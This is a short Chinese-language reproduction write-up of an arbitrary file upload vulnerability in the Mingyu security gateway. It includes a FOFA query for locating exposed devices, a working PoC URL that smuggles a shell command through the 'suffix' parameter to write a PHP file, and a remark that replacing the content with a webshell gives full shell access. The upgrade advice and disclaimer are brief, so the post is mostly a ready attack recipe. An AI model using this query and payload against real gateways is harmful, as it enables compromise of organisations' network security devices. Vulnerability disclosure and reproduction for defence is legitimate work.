明御安全网关任意文件上传漏洞复现

简介

安恒信息明御安全网关(NGFW) 秉持安全可视、简单有效的理念，以资产为视角的全流程防御的下一代安全防护体系，并融合传统防火墙、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。

较低版本的系统存在任意文件上传漏洞，可导致直接getshell。

漏洞复现

FOFA语法：

title="明御安全网关"

访问页面如下：

POC：

/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1%7Cecho+%22test123%22+%3E+.test.php

拼接URL尝试访问

若返回响应信息中存在 success 字符,代表文件已经上传成功 

访问拼接上传的文件路径url：

https://IP:PORT/webui/.test.php

文件上传成功，访问看到上传的内容

将上传的文件内容换成webshell则可导致getshell

修复建议

厂商已发布新版本做出修复

升级至最新版本

免责声明

该文章仅供学习用途，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。

---

结语

没有人规定，一朵花一定要成长为向日葵或者玫瑰。